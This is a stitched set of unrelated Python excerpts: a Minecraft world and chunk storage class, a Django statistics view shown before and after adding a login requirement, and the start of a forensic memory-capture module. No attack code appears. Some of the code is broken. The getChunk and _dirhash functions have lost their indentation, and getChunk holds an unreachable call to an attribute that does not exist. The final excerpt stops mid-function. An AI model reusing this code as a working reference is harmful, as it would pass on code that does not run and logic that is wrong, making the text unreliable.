    self.decompressedChunkQueue.discard(chunk)
def chunkDidDecompress(self, chunk):
    """Track a newly decompressed chunk; when the queue exceeds
    decompressedChunkLimit, compress the oldest entry to bound memory."""
    if not chunk in self.decompressedChunkQueue:
        self.decompressedChunkQueue.append(chunk);
        if self.decompressedChunkLimit and (len(self.decompressedChunkQueue) > self.decompressedChunkLimit):
            oldestChunk = self.decompressedChunkQueue[0];
            oldestChunk.compress(); #calls chunkDidCompress, which removes it from the queue
def chunkDidUnload(self, chunk):
    # Callback from InfdevChunk.unload(): drop it from the loaded queue.
    self.loadedChunkQueue.discard(chunk)
def chunkDidLoad(self, chunk):
    """Track a newly loaded chunk; when the queue exceeds loadedChunkLimit,
    unload the oldest entry to bound memory."""
    if chunk not in self.loadedChunkQueue:
        self.loadedChunkQueue.append(chunk);
        if self.loadedChunkLimit and (len(self.loadedChunkQueue) > self.loadedChunkLimit):
            oldestChunk = self.loadedChunkQueue[0];
            oldestChunk.unload(); #calls chunkDidUnload, which removes it from the queue
@property
@decompress_first
def version(self):
    """Level format version from level.dat, or None for pre-region worlds.
    A truthy version is used throughout this class to select region storage."""
    if 'version' in self.root_tag['Data']:
        return self.root_tag['Data']['version'].value
    else:
        return None
@version.setter
@decompress_first
def version(self, val):
    # Only updates an existing version tag; does not create one.
    if 'version' in self.root_tag['Data']:
        self.root_tag['Data']['version'].value = val
@version.deleter
@decompress_first
def version(self):
    self.root_tag['Data'].pop('version')
def _loadChunk(self, chunk):
    """ load the chunk data from disk, and set the chunk's compressedTag
    and root_tag

    Region worlds delegate to the region file; pre-region worlds read the
    gzipped per-chunk file directly. Any failure is re-raised as
    ChunkMalformed with the original traceback preserved.
    """
    cx, cz = chunk.chunkPosition
    try:
        if self.version:
            regionFile = self.getRegionForChunk(cx, cz)
            regionFile.loadChunk(chunk)
        else:
            with file(chunk.filename, 'rb') as f:
                cdata = f.read()
                chunk.compressedTag = cdata
                data = gunzip(cdata)
                chunk.root_tag = nbt.load(buf=data)
    except Exception, e:
        # three-argument raise keeps the original traceback (Python 2)
        raise ChunkMalformed, "Chunk {0} had an error: {1!r}".format(chunk.chunkPosition, e), sys.exc_info()[2]
def _saveChunk(self, chunk):
    """Write a chunk back to disk: into its region file for region worlds,
    or as a gzipped per-chunk file (creating hash folders) otherwise."""
    cx, cz = chunk.chunkPosition
    if self.version:
        regionFile = self.getRegionForChunk(cx, cz)
        regionFile.saveChunk(chunk)
    else:
        # ensure both levels of the <hash>/<hash>/ folder structure exist
        dir1 = os.path.dirname(chunk.filename)
        dir2 = os.path.dirname(dir1)
        if not os.path.exists(dir2):
            os.mkdir(dir2)
        if not os.path.exists(dir1):
            os.mkdir(dir1)
        chunk.compress()
        with file(chunk.filename, 'wb') as f:
            f.write(chunk.compressedTag)
def discardAllChunks(self):
    """ clear lots of memory, fast. """
    # NOTE(review): the body is empty -- the promised cache clearing is
    # never implemented; confirm whether this is intentional.
def chunkFilenameAt(self, x, y, z):
    """Return the filename of the loaded chunk containing block (x, y, z).
    NOTE(review): raises AttributeError (None.filename) when the chunk is
    not currently loaded -- .get() can return None."""
    cx = x >> 4
    cz = z >> 4
    return self._loadedChunks.get((cx, cz)).filename
def dirhash(self, n):
    # Look up the precomputed base36 folder name for coordinate n (mod 64).
    return self.dirhashes[n % 64];
def _dirhash(self):
n = self
n = n % 64;
s = u"";
if(n >= 36):
s += u"1";
n -= 36;
s += u"0123456789abcdefghijklmnopqrstuvwxyz"[n]
return s;
dirhashes = [_dirhash(n) for n in range(64)];
def regionFilename(self, rx, rz):
    """Return the path of region file r.<rx>.<rz>.mcr in this world's
    region folder."""
    return os.path.join(self.regionDir, "r.%s.%s.mcr" % (rx, rz))
def chunkFilename(self, x, z):
    """Return the pre-region per-chunk path:
    <worldDir>/<dirhash(x)>/<dirhash(z)>/c.<base36 x>.<base36 z>.dat"""
    name = "c.%s.%s.dat" % (base36(x), base36(z))
    return os.path.join(self.worldDir, self.dirhash(x), self.dirhash(z), name)
def extractChunksInBox(self, box, parentFolder):
    # Export every existing chunk within box into parentFolder.
    for cx, cz in box.chunkPositions:
        if self.containsChunk(cx, cz):
            self.extractChunk(cx, cz, parentFolder)
def extractChunk(self, cx, cz, parentFolder):
    """Export chunk (cx, cz) to parentFolder as a gzip-compressed
    c.<x>.<z>.dat file, regardless of this world's storage format."""
    if not os.path.exists(parentFolder):
        os.mkdir(parentFolder)
    chunkFilename = self.chunkFilename(cx, cz)
    outputFile = os.path.join(parentFolder, os.path.basename(chunkFilename))
    chunk = self.getChunk(cx, cz)
    if chunk.compressMode == MCRegionFile.VERSION_GZIP:
        # already gzip-compressed; write its compressed bytes directly
        chunk.compress()
        data = chunk.compressedTag;
    else:
        # stored in another compression mode; re-encode as gzip
        chunk.decompress()
        chunk.packChunkData()
        data = chunk.compressTagGzip(chunk.root_tag)
    with file(outputFile, "wb") as f:
        f.write(data)
def heightMapAt(self, x, z):
    """Return the height-map value at block column (x, z)."""
    zc = z >> 4
    xc = x >> 4
    xInChunk = x & 0xf;
    zInChunk = z & 0xf;
    ch = self.getChunk(xc, zc)
    heightMap = ch.HeightMap
    # the heightmap is ordered (z, x) because in minecraft it is a flat array
    return heightMap[zInChunk, xInChunk];
@property
def loadedChunks(self):
    # (cx, cz) positions of every chunk currently held in memory.
    return self._loadedChunks.keys();
@property
def chunkCount(self):
    """Returns the number of chunks in the level. May initiate a costly
    chunk scan."""
    if self._allChunks is None:
        self.preloadChunkPositions()
    return len(self._allChunks)
@property
def allChunks(self):
    """Iterates over (xPos, zPos) tuples, one for each chunk in the level.
    May initiate a costly chunk scan."""
    if self._allChunks is None:
        self.preloadChunkPositions()
    return self._allChunks.__iter__();
def _getChunkUnloaded(self, cx, cz):
    """return the InfdevChunk object at the given position. because loading
    the chunk is done later, accesses to chunk attributes may
    raise ChunkMalformed"""
    if not self.containsChunk(cx, cz) :
        raise ChunkNotPresent, (cx, cz);
    # create and cache a lazy chunk wrapper on first access
    if not (cx, cz) in self._loadedChunks:
        self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz));
    return self._loadedChunks[cx, cz]
def chunkIsLoaded(self, cx, cz):
    """Whether chunk (cx, cz) is in the loaded-chunk table and loaded."""
    chunk = self._loadedChunks.get((cx, cz))
    return chunk.isLoaded() if chunk is not None else False
def chunkIsCompressed(self, cx, cz):
    """Whether chunk (cx, cz) is in the loaded-chunk table and compressed."""
    chunk = self._loadedChunks.get((cx, cz))
    return chunk.isCompressed() if chunk is not None else False
def chunkIsDirty(self, cx, cz):
    """Whether chunk (cx, cz) is in the loaded-chunk table and dirty."""
    chunk = self._loadedChunks.get((cx, cz))
    return chunk.dirty if chunk is not None else False
def getChunk(self, cx, cz):
""" read the chunk from disk, load it, and return it.
decompression and unpacking is done lazily."""
c = self._getChunkUnloaded(cx, cz)
c.load();
if not (cx, cz) in self._loadedChunks:
raise ChunkMalformed, "Chunk {0} malformed".format((cx, cz))
self.world.malformedChunk(*self.chunkPosition);
return c;
def markDirtyChunk(self, cx, cz):
    # Flag a loaded chunk as changed; unloaded chunks are ignored.
    if not (cx, cz) in self._loadedChunks: return
    self._loadedChunks[cx, cz].chunkChanged();
def markDirtyBox(self, box):
    # Flag every loaded chunk intersecting box as changed.
    for cx, cz in box.chunkPositions:
        self.markDirtyChunk(cx, cz)
def saveInPlace(self):
    """Write all pending changes back to this world: child dimensions,
    dirty chunks, cached player tags, and level.dat itself."""
    for level in self.dimensions.itervalues():
        # saveSelf=True: save the dimension itself, not its parent again
        level.saveInPlace(True);
    dirtyChunkCount = 0;
    if self._loadedChunks:
        for chunk in self._loadedChunks.itervalues():
            if chunk.dirty:
                dirtyChunkCount += 1;
                chunk.save();
    # flush cached multiplayer player tags, then drop the cache
    for path, tag in self.playerTagCache.iteritems():
        tag.saveGzipped(path)
    self.playerTagCache = {}
    self.root_tag.save(self.filename);
    info(u"Saved {0} chunks".format(dirtyChunkCount))
def addEntity(self, entityTag):
    """Add an entity tag to the chunk containing its position and mark
    that chunk dirty; silently does nothing if the chunk is missing."""
    assert isinstance(entityTag, TAG_Compound)
    x, y, z = map(lambda x:int(floor(x)), Entity.pos(entityTag))
    try:
        chunk = self.getChunk(x >> 4, z >> 4)
    except (ChunkNotPresent, ChunkMalformed), e:
        # no chunk to hold the entity; drop it rather than fail
        return None
    chunk.addEntity(entityTag);
    chunk.dirty = True
def tileEntityAt(self, x, y, z):
    # Look up the tile entity at block (x, y, z) via its containing chunk.
    chunk = self.getChunk(x >> 4, z >> 4)
    return chunk.tileEntityAt(x, y, z)
def addTileEntity(self, tileEntityTag):
    """Add a tile entity tag to the chunk containing its position and mark
    that chunk dirty; tags without coordinates or with a missing chunk are
    silently ignored."""
    assert isinstance(tileEntityTag, TAG_Compound)
    if not 'x' in tileEntityTag: return
    x, y, z = TileEntity.pos(tileEntityTag)
    try:
        chunk = self.getChunk(x >> 4, z >> 4)
    except (ChunkNotPresent, ChunkMalformed):
        # no chunk to hold the tile entity; drop it rather than fail
        return
    chunk.addTileEntity(tileEntityTag)
    chunk.dirty = True
def getEntitiesInBox(self, box):
    # Collect entity tags from every chunk intersecting box.
    entities = []
    for chunk, slices, point in self.getChunkSlices(box):
        entities += chunk.getEntitiesInBox(box)
    return entities
def removeEntitiesInBox(self, box):
    # Delete entities in box chunk-by-chunk; returns how many were removed.
    count = 0;
    for chunk, slices, point in self.getChunkSlices(box):
        count += chunk.removeEntitiesInBox(box);
    info("Removed {0} entities".format(count))
    return count;
def removeTileEntitiesInBox(self, box):
    # Delete tile entities in box chunk-by-chunk; returns how many were removed.
    count = 0;
    for chunk, slices, point in self.getChunkSlices(box):
        count += chunk.removeTileEntitiesInBox(box);
    info("Removed {0} tile entities".format(count))
    return count;
def containsPoint(self, x, y, z):
    """A point is inside the level when y is within 0..127 and the chunk
    containing (x, z) exists."""
    return 0 <= y <= 127 and self.containsChunk(x >> 4, z >> 4)
def containsChunk(self, cx, cz):
    """True when chunk (cx, cz) exists on disk or in memory, answered as
    cheaply as possible: scan cache, loaded table, then the filesystem."""
    if self._allChunks is not None: return (cx, cz) in self._allChunks;
    if (cx, cz) in self._loadedChunks: return True;
    if self.version:
        # region world: ask the owning region file, if it exists
        rx, rz = cx>>5, cz>>5
        if not os.path.exists(self.regionFilename(rx, rz)): return False
        return self.getRegionFile(rx,rz).containsChunk(cx, cz)
    else:
        return os.path.exists(self.chunkFilename(cx, cz))
def malformedChunk(self, cx, cz):
    """Forget an unreadable chunk: drop it from the loaded table and
    invalidate the cached bounds."""
    debug(u"Forgetting malformed chunk {0} ({1})".format((cx, cz), self.chunkFilename(cx, cz)))
    if (cx, cz) in self._loadedChunks:
        del self._loadedChunks[(cx, cz)]
        self._bounds = None
def createChunk(self, cx, cz):
    """Create a brand-new empty chunk at (cx, cz); raises ValueError if
    one already exists. Invalidates the cached bounds."""
    if self.containsChunk(cx, cz): raise ValueError, "{0}:Chunk {1} already present!".format(self, (cx, cz))
    if self._allChunks is not None:
        self._allChunks.add((cx, cz))
    self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz), create=True)
    self._bounds = None
def createChunks(self, chunks):
    """Create every missing chunk in the given (cx, cz) iterable,
    compressing each immediately to limit memory; returns the list of
    positions actually created."""
    i = 0;
    ret = [];
    for cx, cz in chunks:
        i += 1;
        if not self.containsChunk(cx, cz):
            ret.append((cx, cz))
            self.createChunk(cx, cz);
            self.compressChunk(cx, cz);
        assert self.containsChunk(cx, cz), "Just created {0} but it didn't take".format((cx, cz))
        if i % 100 == 0:
            # periodic progress logging for large batches
            info(u"Chunk {0}...".format(i))
    info("Created {0} chunks.".format(len(ret)))
    return ret;
def createChunksInBox(self, box):
    # Create every missing chunk within box.
    info(u"Creating {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
    return self.createChunks(box.chunkPositions);
def deleteChunk(self, cx, cz):
    """Remove chunk (cx, cz) from memory and from disk. Region files left
    completely empty are deleted. Invalidates the cached bounds."""
    if self._allChunks is not None: self._allChunks.discard((cx, cz))
    if (cx, cz) in self._loadedChunks:
        del self._loadedChunks[(cx, cz)]
    if self.version:
        r = cx >> 5, cz >> 5
        rf = self.getRegionFile(*r)
        if rf:
            # zero the chunk's offset entry to free its slot in the region
            rf.setOffset(cx & 0x1f , cz & 0x1f, 0)
            if (rf.offsets == 0).all():
                # region is now empty; remove the file entirely
                rf.close()
                os.unlink(rf.path)
                del self.regionFiles[r]
    else:
        os.unlink(self.chunkFilename(cx, cz))
    self._bounds = None
def deleteChunksInBox(self, box):
    """Delete every existing chunk within box; returns the list of
    positions actually deleted."""
    info(u"Deleting {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
    i = 0;
    ret = [];
    for cx, cz in itertools.product(xrange(box.mincx, box.maxcx), xrange(box.mincz, box.maxcz)):
        i += 1;
        if self.containsChunk(cx, cz):
            self.deleteChunk(cx, cz);
            ret.append((cx, cz))
        assert not self.containsChunk(cx, cz), "Just deleted {0} but it didn't take".format((cx, cz))
        if i % 100 == 0:
            # periodic progress logging for large batches
            info(u"Chunk {0}...".format(i))
    return ret
spawnxyz = ["SpawnX", "SpawnY", "SpawnZ"]
def playerSpawnPosition(self, player=None):
    """
    xxx if player is None then it gets the default spawn position for the world
    if player hasn't used a bed then it gets the default spawn position
    """
    dataTag = self.root_tag["Data"]
    if player is None:
        playerSpawnTag = dataTag
    else:
        playerSpawnTag = self.getPlayerTag(player)
    # fall back to the world spawn for any coordinate the player tag lacks
    return [playerSpawnTag.get(i, dataTag[i]).value for i in self.spawnxyz]
def setPlayerSpawnPosition(self, pos, player=None):
    """ xxx if player is None then it sets the default spawn position for the world """
    if player is None:
        playerSpawnTag = self.root_tag["Data"]
    else:
        playerSpawnTag = self.getPlayerTag(player)
    # write SpawnX/SpawnY/SpawnZ from the (x, y, z) tuple
    for name, val in zip(self.spawnxyz, pos):
        playerSpawnTag[name] = nbt.TAG_Int(val);
def getPlayerPath(self, player):
    # Multiplayer-only: the single-player "Player" tag lives inside level.dat.
    assert player != "Player"
    return os.path.join(self.playersDir, player + ".dat")
def getPlayerTag(self, player="Player"):
    """Return the NBT tag for a player, raising PlayerNotFound if absent.

    "Player" is read from level.dat's Data compound (single-player);
    other names are loaded from players/<name>.dat and cached in
    playerTagCache so edits persist via saveInPlace.
    """
    if player == "Player":
        if player in self.root_tag["Data"]:
            #single-player world
            return self.root_tag["Data"]["Player"];
        raise PlayerNotFound, player
    else:
        playerFilePath = self.getPlayerPath(player)
        if os.path.exists(playerFilePath):
            #multiplayer world, found this player
            playerTag = self.playerTagCache.get(playerFilePath)
            if playerTag is None:
                playerTag = nbt.load(playerFilePath)
                self.playerTagCache[playerFilePath] = playerTag
            return playerTag
        else:
            raise PlayerNotFound, "{0}".format(player)
def getPlayerDimension(self, player="Player"):
    """Return the dimension number the player is in; 0 (overworld) when
    the tag carries no Dimension entry."""
    tag = self.getPlayerTag(player)
    return tag["Dimension"].value if "Dimension" in tag else 0
def setPlayerDimension(self, d, player="Player"):
    # Set the player's dimension, creating the Dimension tag if missing.
    playerTag = self.getPlayerTag(player)
    if "Dimension" not in playerTag: playerTag["Dimension"] = nbt.TAG_Int(0);
    playerTag["Dimension"].value = d;
def setPlayerPosition(self, pos, player="Player"):
    # Store the (x, y, z) position as a list of NBT doubles.
    posList = nbt.TAG_List([nbt.TAG_Double(p) for p in pos]);
    playerTag = self.getPlayerTag(player)
    playerTag["Pos"] = posList
def getPlayerPosition(self, player="Player"):
    """Return the player's [x, y, z] position as plain numbers."""
    return [coord.value for coord in self.getPlayerTag(player)["Pos"]]
def setPlayerOrientation(self, yp, player="Player"):
    # Store (yaw, pitch) as a list of NBT floats.
    self.getPlayerTag(player)["Rotation"] = nbt.TAG_List([nbt.TAG_Float(p) for p in yp])
def getPlayerOrientation(self, player="Player"):
    """ returns (yaw, pitch) """
    yp = map(lambda x:x.value, self.getPlayerTag(player)["Rotation"]);
    y, p = yp;
    # nudge pitch off the exact 0/180 degenerate values
    # (presumably to avoid gimbal problems downstream -- confirm)
    if p == 0: p = 0.000000001;
    if p == 180.0: p -= 0.000000001;
    yp = y, p;
    return array(yp);
def setPlayerAbilities(self, gametype, player="Player"):
    """Set the player's abilities compound to match the given game type."""
    playerTag = self.getPlayerTag(player)
    # Check for the Abilities tag. It will be missing in worlds from before
    # Beta 1.9 Prerelease 5.
    if not 'abilities' in playerTag:
        playerTag['abilities'] = TAG_Compound()
    # Assumes creative (1) is the only mode with these abilities set,
    # which is true for now. Future game modes may not hold this to be
    # true, however.
    if gametype == 1:
        playerTag['abilities']['instabuild'] = TAG_Byte(1)
        playerTag['abilities']['mayfly'] = TAG_Byte(1)
        playerTag['abilities']['invulnerable'] = TAG_Byte(1)
    else:
        playerTag['abilities']['flying'] = TAG_Byte(0)
        playerTag['abilities']['instabuild'] = TAG_Byte(0)
        playerTag['abilities']['mayfly'] = TAG_Byte(0)
        playerTag['abilities']['invulnerable'] = TAG_Byte(0)
def setPlayerGameType(self, gametype, player="Player"):
    """Set the game type for a player and sync their abilities to it."""
    playerTag = self.getPlayerTag(player)
    # This annoyingly works differently between single- and multi-player:
    # single-player stores GameType on the level, multiplayer on the player.
    if player == "Player":
        self.GameType = gametype
    else:
        playerTag['playerGameType'] = TAG_Int(gametype)
    self.setPlayerAbilities(gametype, player)
def getPlayerGameType(self, player="Player"):
    """Return the game type: the level's GameType for single-player,
    otherwise the player tag's playerGameType value."""
    if player == "Player":
        return self.GameType
    return self.getPlayerTag(player)["playerGameType"].value
class MCAlphaDimension (MCInfdevOldLevel):
    """A non-overworld dimension (Nether, The End, ...) stored in a DIM<n>
    subfolder of its parent world. Shares level.dat, the players folder
    and the player tag cache with the parent."""
    def __init__(self, parentWorld, dimNo, create=False):
        filename = os.path.join(parentWorld.worldDir, "DIM" + str(int(dimNo)))
        self.parentWorld = parentWorld;
        MCInfdevOldLevel.__init__(self, filename, create)
        self.dimNo = dimNo
        # dimensions have no level.dat of their own; reuse the parent's
        self.filename = parentWorld.filename
        self.playersDir = parentWorld.playersDir;
        self.players = parentWorld.players
        self.playerTagCache = parentWorld.playerTagCache
    @property
    def root_tag(self): return self.parentWorld.root_tag;
    def __str__(self):
        return "MCAlphaDimension({0}, {1})".format(self.parentWorld, self.dimNo)
    def loadLevelDat(self, create=False, random_seed=None, last_played=None):
        # no-op: the parent world owns level.dat
        pass;
    def preloadDimensions(self):
        # no-op: dimensions cannot nest
        pass
    def create(self, *args, **kw):
        # creating a dimension only requires its DIM folder to exist
        if not os.path.exists(self.worldDir):
            os.mkdir(self.worldDir)
    # human-readable names for the known dimension numbers
    dimensionNames = { -1: "Nether", 1: "The End"};
    @property
    def displayName(self):
        return u"{0} ({1})".format(self.parentWorld.displayName,
                                   self.dimensionNames.get(self.dimNo, "Dimension %d" % self.dimNo))
    def saveInPlace(self, saveSelf=False):
        """saving the dimension will save the parent world, which will save any
        other dimensions that need saving. the intent is that all of them can
        stay loaded at once for fast switching """
        if saveSelf:
            MCInfdevOldLevel.saveInPlace(self);
        else:
            self.parentWorld.saveInPlace();
from zipfile import ZipFile, is_zipfile
import tempfile
class ZipSchematic (MCInfdevOldLevel):
    """A world packaged as a zip archive, read by extracting level.dat to a
    temporary folder and deferring chunk reads to the archive. Saving writes
    the whole extracted folder back into a new zip."""
    def __init__(self, filename):
        tempdir = tempfile.mktemp("schematic")
        zf = ZipFile(filename)
        self.zipfile = zf
        # only level.dat is extracted up front; chunks are read on demand
        zf.extract("level.dat", tempdir)
        MCInfdevOldLevel.__init__(self, tempdir)
        self.filename = filename
        try:
            # NOTE(review): schematicDat is first a path string, then rebound
            # to the loaded NBT tag; on failure the later "Materials" check
            # runs against the leftover string (substring test).
            schematicDat = os.path.join(tempdir, "schematic.dat")
            with closing(self.zipfile.open("schematic.dat")) as f:
                schematicDat = nbt.load(buf=gunzip(f.read()))
            self.Width = schematicDat['Width'].value;
            self.Height = schematicDat['Height'].value;
            self.Length = schematicDat['Length'].value;
        except Exception, e:
            # schematic.dat is optional; fall back to default dimensions
            print "Exception reading schematic.dat, skipping: {0!r}".format(e)
            self.Width = 0
            self.Height = 128
            self.Length = 0
        if "Materials" in schematicDat:
            self.materials = namedMaterials[schematicDat["Materials"].value]
    def close(self):
        # close the archive and remove the temporary extraction folder
        MCInfdevOldLevel.close(self)
        self.zipfile.close()
        shutil.rmtree(self.worldDir, True)
    def getWorldBounds(self):
        return BoundingBox((0, 0, 0), (self.Width, self.Height, self.Length))
    @classmethod
    def _isLevel(cls, filename):
        # any valid zip archive is treated as a candidate ZipSchematic
        return is_zipfile(filename)
    def _loadChunk(self, chunk):
        if self.version:
            # region chunks were extracted to disk by preloadRegions
            return MCInfdevOldLevel._loadChunk(self, chunk)
        else:
            # pre-region chunks are read straight out of the archive
            cdata = self.zipfile.read(chunk.chunkFilename)
            chunk.compressedTag = cdata
            chunk.decompress()
    def _saveChunk(self, chunk):
        if self.version:
            return MCInfdevOldLevel._saveChunk(self, chunk)
        else:
            raise NotImplementedError, "Cannot save chunk-format zipfiles!"
    def saveInPlace(self):
        self.saveToFile(self.filename)
    def saveToFile(self, filename):
        """Zip the extracted world folder and atomically-ish replace the
        target file with the new archive."""
        tempfile = filename + ".new"
        from schematic import zipdir
        zipdir(self.worldDir, tempfile)
        if os.path.exists(filename):
            os.remove(filename)
        shutil.copy(tempfile, filename)
    def containsChunk(self, cx, cz):
        return (cx, cz) in self.allChunks
    def preloadRegions(self):
        # region files must live on disk for MCRegionFile; extract everything
        self.zipfile.extractall(self.worldDir)
        self.regionFiles = {}
        MCInfdevOldLevel.preloadRegions(self)
    def preloadChunkPaths(self):
        """Scan the archive's file listing for pre-region chunk entries
        (<hash>/<hash>/c.<x>.<z>.dat) without extracting anything."""
        info(u"Scanning for chunks...")
        self._allChunks = set()
        infos = self.zipfile.infolist()
        names = [i.filename.split('/') for i in infos]
        goodnames = [n for n in names if len(n) == 3 and n[0] in self.dirhashes and n[1] in self.dirhashes]
        for name in goodnames:
            c = name[2].split('.')
            if len(c) == 4 and c[0].lower() == 'c' and c[3].lower() == 'dat':
                try:
                    cx, cz = (decbase36(c[1]), decbase36(c[2]))
                except Exception, e:
                    info('Skipped file {0} ({1})'.format('.'.join(c), e))
                    continue
                self._allChunks.add((cx, cz))
        info(u"Found {0} chunks.".format(len(self._allChunks)))
    def preloadDimensions(self):
        # zipped schematics carry no dimensions
        pass
    def loadLevelDat(self, create=False, random_seed=None, last_played=None):
        if create:
            raise NotImplementedError, "Cannot save zipfiles yet!"
        # read level.dat straight from the archive, gunzipping in memory
        with closing(self.zipfile.open("level.dat")) as f:
            with closing(gzip.GzipFile(fileobj=StringIO(f.read()))) as g:
                self.root_tag = nbt.load(buf=g.read())
    def chunkFilename(self, x, z):
        # archive member names always use forward slashes, not os.path.join
        s = "/".join((self.dirhash(x), self.dirhash(z),
                      "c.%s.%s.dat" % (base36(x), base36(z))));
        return s;
|
from django.shortcuts import render
from django.http import HttpResponse
# Import models
from mapApp.models.incident import Incident
from mapApp.models.hazard import Hazard
from mapApp.models.theft import Theft
from mapApp.models.alert_area import AlertArea
from django.contrib.auth.models import User
from mapApp.models.alert_notification import IncidentNotification, HazardNotification, TheftNotification
def stats(request):
    """Render the stats page: all reported points, plus the subsets that
    fall inside the current user's alert areas (geofences).

    NOTE(review): request.user is read without a login_required guard here;
    anonymous requests will see empty geofences -- confirm access policy.
    """
    user = request.user
    # Get the user's alertable points in the last month
    incidents = Incident.objects.all()#filter(incidentNotification__user=user.id)
    # split incidents by type using the report's free-text category
    nearmisses = incidents.filter(incident__contains="Near collision")
    collisions = incidents.exclude(incident__contains="Near collision")
    hazards = Hazard.objects.all()
    thefts = Theft.objects.all()
    rois = AlertArea.objects.filter(user=user.id)
    # recent sets = points that intersect an rois as defined by user and are reported in last month
    # start from empty querysets and union in matches per region
    collisionsInPoly = Incident.objects.none()
    nearmissesInPoly = Incident.objects.none()
    hazardsInPoly = Hazard.objects.none()
    theftsInPoly = Theft.objects.none()
    # Find intersecting points
    for g in rois:
        collisionsInPoly = collisionsInPoly | collisions.filter(geom__intersects=g.geom)
        nearmissesInPoly = nearmissesInPoly | nearmisses.filter(geom__intersects=g.geom)
        hazardsInPoly = hazardsInPoly | hazards.filter(geom__intersects=g.geom)
        theftsInPoly = theftsInPoly | thefts.filter(geom__intersects=g.geom)
    context = {
        'user': user,
        'geofences': rois,
        'collisions': collisions,
        'nearmisses': nearmisses,
        'hazards': hazards,
        'thefts': thefts,
        'collisionsInPoly': collisionsInPoly,
        'nearmissesInPoly': nearmissesInPoly,
        'hazardsInPoly': hazardsInPoly,
        'theftsInPoly': theftsInPoly,
        # 'collisionsOutPoly': collisions.exclude(pk__in=collisionsInPoly),
        # 'nearmissesOutPoly': nearmisses.exclude(pk__in=nearmissesInPoly),
        # 'hazardsOutPoly': hazards.exclude(pk__in=hazardsInPoly),
        # 'theftsOutPoly': thefts.exclude(pk__in=theftsInPoly),
    }
    return render(request, 'mapApp/stats.html', context)
Made the stats page viewable by logged-in users only (added the `login_required` decorator).
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
# Import models
from mapApp.models.incident import Incident
from mapApp.models.hazard import Hazard
from mapApp.models.theft import Theft
from mapApp.models.alert_area import AlertArea
from django.contrib.auth.models import User
from mapApp.models.alert_notification import IncidentNotification, HazardNotification, TheftNotification
@login_required
def stats(request):
    """Render the stats page for the logged-in user: all reported points,
    plus the subsets that fall inside the user's alert areas (geofences)."""
    user = request.user
    # Get the user's alertable points in the last month
    incidents = Incident.objects.all()#filter(incidentNotification__user=user.id)
    # split incidents by type using the report's free-text category
    nearmisses = incidents.filter(incident__contains="Near collision")
    collisions = incidents.exclude(incident__contains="Near collision")
    hazards = Hazard.objects.all()
    thefts = Theft.objects.all()
    rois = AlertArea.objects.filter(user=user.id)
    # recent sets = points that intersect an rois as defined by user and are reported in last month
    # start from empty querysets and union in matches per region
    collisionsInPoly = Incident.objects.none()
    nearmissesInPoly = Incident.objects.none()
    hazardsInPoly = Hazard.objects.none()
    theftsInPoly = Theft.objects.none()
    # Find intersecting points
    for g in rois:
        collisionsInPoly = collisionsInPoly | collisions.filter(geom__intersects=g.geom)
        nearmissesInPoly = nearmissesInPoly | nearmisses.filter(geom__intersects=g.geom)
        hazardsInPoly = hazardsInPoly | hazards.filter(geom__intersects=g.geom)
        theftsInPoly = theftsInPoly | thefts.filter(geom__intersects=g.geom)
    context = {
        'user': user,
        'geofences': rois,
        'collisions': collisions,
        'nearmisses': nearmisses,
        'hazards': hazards,
        'thefts': thefts,
        'collisionsInPoly': collisionsInPoly,
        'nearmissesInPoly': nearmissesInPoly,
        'hazardsInPoly': hazardsInPoly,
        'theftsInPoly': theftsInPoly,
        # 'collisionsOutPoly': collisions.exclude(pk__in=collisionsInPoly),
        # 'nearmissesOutPoly': nearmisses.exclude(pk__in=nearmissesInPoly),
        # 'hazardsOutPoly': hazards.exclude(pk__in=hazardsInPoly),
        # 'theftsOutPoly': thefts.exclude(pk__in=theftsInPoly),
    }
    return render(request, 'mapApp/stats.html', context)
|
from progressbar import ProgressBar, Percentage, Bar, ETA, FileTransferSpeed
from enum import Enum
import errno
import select
import socket
import s3fs
import logging
from margaritashotgun.exceptions import *
logger = logging.getLogger(__name__)
class OutputDestinations(Enum):
    """Supported targets for a memory dump: a local file or an S3 bucket."""
    local = 'local'
    s3 = 's3'
class Memory():
    """Receives a remote memory dump over a (tunneled) TCP socket and
    streams it to a local file or to S3, with optional progress reporting."""
    def __init__(self, remote_addr, mem_size, progressbar=False,
                 recv_size=1048576, sock_timeout=1):
        """
        :type remote_addr: str
        :param remote_addr: hostname or ip address of target server
        :type mem_size: int
        :param mem_size: target server memory size in bytes
        :type progressbar: bool
        :param progressbar: ncurses progress bar toggle
        :type recv_size: int
        :param recv_size: transfer socket max receive size
        :type sock_timeout: int
        :param sock_timeout: transfer socket receive timeout
        """
        self.mem_size = mem_size
        self.progressbar = progressbar
        self.recv_size = recv_size
        self.sock_timeout = sock_timeout
        # LIME output overhead allowance (3%)
        self.padding_percentage = 0.03
        # NOTE(review): this call result shadows the max_size() method on
        # the instance -- after __init__, self.max_size is a number.
        self.max_size = self.max_size(mem_size, self.padding_percentage)
        # log progress roughly every update_interval receive buffers
        self.update_interval = 5
        self.update_threshold = recv_size * self.update_interval
        self.remote_addr = remote_addr
        # total bytes received so far
        self.transfered = 0
        # last logged percentage (non-progressbar mode)
        self.progress = 0
        self.widgets = [' {0} '.format(remote_addr), Percentage(), ' ', Bar(),
                        ' ', ETA(), ' ', FileTransferSpeed()]
        self.sock = None
        self.outfile = None
        self.bar = None
    def max_size(self, mem_size, padding_percentage):
        """
        Calculates the excpected size in bytes of the memory capture
        :type mem_size: int
        :param mem_size: target server memory in bytes
        :type padding_percentage: float
        :param padding_percentage: Output overhead of lime format
        """
        # NOTE(review): the variable name says kb but mem_size is documented
        # as bytes, and the result is multiplied by 1024 -- the units look
        # inconsistent; confirm intended semantics.
        size_in_kb = mem_size + mem_size * padding_percentage
        return size_in_kb * 1024
    def capture(self, tunnel_addr, tunnel_port, filename=None,
                bucket=None, destination=None):
        """
        Captures memory based on the provided OutputDestination
        :type tunnel_addr: str
        :param tunnel_port: ssh tunnel hostname or ip
        :type tunnel_port: int
        :param tunnel_port: ssh tunnel port
        :type filename: str
        :param filename: memory dump output filename
        :type bucket: str
        :param bucket: output s3 bucket
        :type destination: :py:class:`margaritashotgun.memory.OutputDestinations`
        :param destination: OutputDestinations member
        """
        if filename is None:
